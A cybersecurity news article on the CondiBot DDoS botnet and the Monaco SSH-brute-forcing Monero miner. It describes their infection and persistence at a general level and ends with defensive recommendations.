Emerging Malware Campaigns Exploit Network Devices for DDoS Attacks and Cryptocurrency Mining
In recent developments, cybersecurity researchers have identified two novel malware strains—CondiBot and Monaco—that are compromising network devices to orchestrate large-scale distributed denial-of-service (DDoS) attacks and illicit cryptocurrency mining operations. These campaigns signify a strategic shift, as cybercriminals increasingly target the very infrastructure that underpins organizational networks.
Discovery and Initial Analysis
On March 6, 2026, security analysts uncovered samples of CondiBot and Monaco, both previously undocumented. CondiBot, a DDoS botnet derived from the Mirai framework, infects Linux-based network devices, transforming them into nodes capable of overwhelming targeted systems with traffic. Monaco, written in Go 1.24.0, functions as an SSH scanner and cryptocurrency miner, infiltrating servers, routers, and IoT devices by brute-forcing weak SSH credentials to deploy Monero mining software. Notably, neither strain had been flagged on major threat intelligence platforms prior to this discovery.
Escalating Threat Landscape
The emergence of these malware strains underscores a broader trend where financially motivated actors exploit vulnerabilities in network infrastructure—a tactic once predominantly associated with state-sponsored groups. The 2025 Verizon Data Breach Investigation Report highlighted an eightfold increase in exploits targeting network devices, with a median time to exploit at zero days and a median patch time of 30 days. Additionally, Google’s Threat Intelligence Group reported that nearly 25% of zero-day vulnerabilities exploited in 2025 targeted network and security systems, indicating a growing focus on this attack vector.
Challenges in Detection and Mitigation
A significant concern is the visibility gap in enterprise environments. Traditional endpoint detection and response tools often lack insight into the embedded firmware layers of network appliances. Since these devices cannot host conventional security agents, attackers can maintain a presence undetected for extended periods, utilizing compromised devices for computational tasks or as launch points for further attacks.
CondiBot’s Infection Mechanism and Persistence
CondiBot initiates its attack by deploying a payload through various file transfer utilities—such as wget, curl, tftp, and ftpget—to ensure delivery regardless of the target device’s available tools. Upon execution, it disables system reboot utilities by altering file permissions, preventing simple restarts from removing the infection. The malware then connects to a command-and-control (C2) server, registering itself with a unique identifier. It remains in a standby state, awaiting attack commands from the C2, and can execute any of its 32 attack modules upon instruction. This represents an expansion from earlier Condi variants, which featured fewer attack modules.
Monaco’s Tactics and Objectives
Monaco employs a different strategy, focusing on brute-forcing SSH credentials to gain access to devices. Once inside, it deploys Monero cryptocurrency mining software, exploiting the device’s resources for financial gain. The use of Go programming language enhances its cross-platform capabilities, allowing it to target a wide range of devices effectively.
Implications for Network Security
The advent of CondiBot and Monaco highlights the evolving tactics of cybercriminals, who are now leveraging network devices not only as entry points but also as tools for executing attacks and generating illicit revenue. This evolution necessitates a reevaluation of security strategies, emphasizing the need for comprehensive monitoring and protection of network infrastructure components.
Recommendations for Mitigation
To defend against such threats, organizations should consider the following measures:
1. Regular Firmware Updates: Ensure that all network devices are running the latest firmware versions to patch known vulnerabilities.
2. Strong Authentication Practices: Implement robust password policies and consider using SSH keys for authentication to mitigate the risk of brute-force attacks.
3. Network Segmentation: Divide the network into segments to limit the spread of malware and reduce the attack surface.
4. Enhanced Monitoring: Deploy monitoring solutions capable of detecting anomalies in network traffic and device behavior, including unusual outbound connections or resource utilization.
5. Access Controls: Restrict access to network devices to authorized personnel and use management interfaces that are not exposed to the internet.
6. Incident Response Planning: Develop and regularly update incident response plans to ensure swift action in the event of a compromise.
Conclusion
The discovery of CondiBot and Monaco serves as a stark reminder of the dynamic nature of cyber threats. As attackers continue to innovate, organizations must adopt proactive and adaptive security measures to protect their network infrastructure from being co-opted into malicious activities.
